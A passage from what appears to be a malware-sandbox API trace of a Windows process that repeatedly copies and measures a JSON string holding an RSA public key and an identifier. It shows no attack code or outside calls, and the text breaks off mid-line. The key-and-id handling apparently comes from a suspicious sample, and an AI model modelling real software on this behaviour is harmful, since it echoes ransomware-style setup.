KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 547 [0106.701] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 547 [0106.702] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 547 [0106.702] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 547 [0106.702] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 547 [0106.702] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 547 [0106.702] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 547 [0106.702] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 547 [0106.702] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 547 [0106.702] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 547 [0106.702] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 547 [0106.702] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 547 [0106.702] lstrcpyW (in: lpString1=0x51a7c0, lpString2="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}" | out: lpString1="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}" [0106.702] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x338f2d8 | out: hHeap=0x730000) returned 1 [0106.702] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 547 [0106.702] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x448) returned 0x3378b88 [0106.702] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xfdaa778, cbMultiByte=-1, lpWideCharStr=0x3378b88, cchWideChar=548 | out: lpWideCharStr="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 548 [0106.702] lstrcpyW (in: lpString1=0x51a7c0, lpString2="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}" | out: lpString1="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}" [0106.702] lstrlenW (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0106.702] lstrlenA (lpString="\",\"id\":\"") returned 8 [0106.703] lstrcpyA (in: lpString1=0xfdaab78, lpString2="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}" | out: lpString1="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}" [0106.703] lstrcpyA (in: lpString1=0xfdaa778, lpString2="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}" | out: lpString1="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}" [0106.703] lstrlenA (lpString="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 42 [0106.703] lstrlenA (lpString="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 42 [0106.703] lstrlenA (lpString="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 42 [0106.703] lstrlenA (lpString="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 42 [0106.703] lstrlenA (lpString="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 42 [0106.703] lstrlenA (lpString="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 42 [0106.703] lstrlenA (lpString="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 42 [0106.703] lstrlenA (lpString="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 42 [0106.703] lstrlenA (lpString="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 42 [0106.703] lstrlenA (lpString="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 42 [0106.703] lstrlenA (lpString="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 42 [0106.703] lstrlenA (lpString="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 42 [0106.703] lstrlenA (lpString="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 42 [0106.703] lstrlenA (lpString="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 42 [0106.703] lstrlenA (lpString="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 42 [0106.703] lstrlenA (lpString="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 42 [0106.703] lstrlenA (lpString="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 42 [0106.703] lstrlenA (lpString="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 42 [0106.703] lstrlenA (lpString="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 42 [0106.703] lstrlenA (lpString="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 42 [0106.703] lstrlenA (lpString="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 42 [0106.703] lstrlenA (lpString="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 42 [0106.703] lstrlenA (lpString="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 42 [0106.703] lstrlenA (lpString="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 42 [0106.703] lstrlenA (lpString="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 42 [0106.703] lstrlenA (lpString="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 42 [0106.703] lstrlenA (lpString="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 42 [0106.704] lstrlenA (lpString="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 42 [0106.704] lstrlenA (lpString="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 42 [0106.704] lstrlenA (lpString="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 42 [0106.704] lstrlenA (lpString="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 42 [0106.704] lstrlenA (lpString="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 42 [0106.704] lstrlenA (lpString="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 42 [0106.704] lstrlenA (lpString="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 42 [0106.704] lstrlenA (lpString="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 42 [0106.704] lstrlenA (lpString="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 42 [0106.704] lstrlenA (lpString="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 42 [0106.704] lstrlenA (lpString="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 42 [0106.704] lstrlenA (lpString="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 42 [0106.704] lstrlenA (lpString="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 42 [0106.704] lstrlenA (lpString="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 42 [0106.704] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x30) returned 0x3382988 [0106.704] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x854) returned 0x3348768 [0106.704] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3382988, cbMultiByte=-1, lpWideCharStr=0x3348768, cchWideChar=1066 | out: lpWideCharStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 43 [0106.704] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x860) returned 0x338e688 [0106.704] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x3348768 | out: hHeap=0x730000) returned 1 [0106.704] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x3382988 | out: hHeap=0x730000) returned 1 [0106.704] lstrcpyW (in: lpString1=0x521cf0, lpString2="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}" | out: 